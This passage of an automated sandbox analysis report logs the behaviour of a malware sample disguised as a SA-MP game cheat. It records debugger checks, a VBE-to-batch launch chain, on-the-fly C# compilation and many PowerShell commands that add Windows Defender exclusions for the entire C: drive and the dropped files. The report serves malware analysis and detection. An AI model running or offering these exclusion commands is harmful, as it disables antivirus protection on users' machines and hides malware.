                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\services.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\services.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D0F838
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F9D5 SetUnhandledExceptionFilter,0_2_00D0F9D5
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D0FBCA
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D18EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D18EBD
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msportComWin\BridgePortsurrogateserverref.exe "C:\msportComWin/BridgePortsurrogateserverref.exe"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F654 cpuid 0_2_00D0F654
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D0AF0F
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\msportComWin\BridgePortsurrogateserverref.exe VolumeInformationJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeQueries volume information: C:\msportComWin\jnowHpJlZlXal.exe VolumeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeQueries volume information: C:\msportComWin\jnowHpJlZlXal.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
